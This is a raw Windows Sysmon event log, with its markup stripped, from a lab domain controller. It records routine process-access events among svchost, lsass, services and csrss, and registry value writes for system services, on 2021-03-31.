12:00:44.987{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+19ab3|c:\windows\system32\lsm.dll+1fc37|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001268Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:44.987{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+1fb39|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 13241300x80000000000000001267Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 
12:00:44.987{266CAFBE-6467-6064-0100-00000000AE01}4SystemHKLM\System\CurrentControlSet\Services\EventLog\System\mrxsmb\ParameterMessageFile%%SystemRoot%%\System32\kernel32.dll 13241300x80000000000000001266Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:00:44.987{266CAFBE-646C-6064-1500-00000000AE01}1316C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\EventLog\System\mrxsmb\ParameterMessageFile%%SystemRoot%%\System32\kernel32.dll 10341000x80000000000000001265Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:44.987{266CAFBE-646A-6064-0B00-00000000AE01}8561016C:\Windows\system32\lsass.exe{266CAFBE-646C-6064-1500-00000000AE01}1316C:\Windows\system32\svchost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001264Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:44.987{266CAFBE-646A-6064-0B00-00000000AE01}8561016C:\Windows\system32\lsass.exe{266CAFBE-646C-6064-1500-00000000AE01}1316C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001263Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:44.987{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1700-00000000AE01}1844C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+6a63|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001262Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:44.971{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001261Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:44.971{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001260Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:44.971{266CAFBE-646A-6064-0B00-00000000AE01}8561016C:\Windows\system32\lsass.exe{266CAFBE-646A-6064-0A00-00000000AE01}840C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+1a18d|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 13241300x80000000000000001259Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:00:44.956{266CAFBE-6467-6064-0100-00000000AE01}4SystemHKLM\System\CurrentControlSet\Services\EventLog\System\mrxsmb\ParameterMessageFile%%SystemRoot%%\System32\kernel32.dll 13241300x80000000000000001258Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:00:44.956{266CAFBE-646C-6064-1500-00000000AE01}1316C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Dnscache\Parameters\Probe\{0c39d37d-e363-4d88-8ecd-11e79ce9ff0f}\NetworkPerformsHijackingDWORD (0x00000000) 13241300x80000000000000001257Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:00:44.956{266CAFBE-646C-6064-1500-00000000AE01}1316C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Dnscache\Parameters\Probe\{0c39d37d-e363-4d88-8ecd-11e79ce9ff0f}\LastProbeTimeDWORD (0x6064646c) 13241300x80000000000000001256Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 
12:00:44.956{266CAFBE-646C-6064-1200-00000000AE01}1196C:\Windows\system32\svchost.exeHKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles\{0C39D37D-E363-4D88-8ECD-11E79CE9FF0F}\DateLastConnectedBinary Data 10341000x80000000000000001255Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:44.940{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001254Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:44.940{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001253Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:44.940{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001252Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:44.940{266CAFBE-646A-6064-0A00-00000000AE01}840932C:\Windows\system32\services.exe{266CAFBE-646C-6064-1700-00000000AE01}1844C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\services.exe+1713f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001251Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:44.940{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001250Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:44.924{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001249Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:44.924{266CAFBE-646A-6064-0B00-00000000AE01}8561016C:\Windows\system32\lsass.exe{266CAFBE-646A-6064-0A00-00000000AE01}840C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+1a18d|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001248Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:44.924{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1700-00000000AE01}1844C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001247Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:44.924{266CAFBE-6469-6064-0500-00000000AE01}6241132C:\Windows\system32\csrss.exe{266CAFBE-646C-6064-1700-00000000AE01}1844C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000001246Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:44.924{266CAFBE-646A-6064-0A00-00000000AE01}8401184C:\Windows\system32\services.exe{266CAFBE-646C-6064-1700-00000000AE01}1844C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\services.exe+307d|C:\Windows\system32\services.exe+6334|C:\Windows\system32\services.exe+dc24|C:\Windows\system32\services.exe+d3ee|C:\Windows\system32\services.exe+220e1|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001245Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:44.924{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001244Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:44.924{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001243Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:44.924{266CAFBE-646A-6064-0B00-00000000AE01}8561016C:\Windows\system32\lsass.exe{266CAFBE-646A-6064-0A00-00000000AE01}840C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+1a18d|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 13241300x80000000000000001242Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 
12:00:44.924{266CAFBE-6467-6064-0100-00000000AE01}4SystemHKLM\System\CurrentControlSet\Services\rspndr\DriverMinorVersionDWORD (0x00000000) 13241300x80000000000000001241Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:00:44.924{266CAFBE-6467-6064-0100-00000000AE01}4SystemHKLM\System\CurrentControlSet\Services\rspndr\DriverMajorVersionDWORD (0x00000000) 13241300x80000000000000001240Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:00:44.924{266CAFBE-6467-6064-0100-00000000AE01}4SystemHKLM\System\CurrentControlSet\Services\rspndr\NdisMinorVersionDWORD (0x0000001e) 13241300x80000000000000001239Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:00:44.924{266CAFBE-6467-6064-0100-00000000AE01}4SystemHKLM\System\CurrentControlSet\Services\rspndr\NdisMajorVersionDWORD (0x00000006) 10341000x80000000000000001238Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:44.909{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1500-00000000AE01}1316C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001237Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
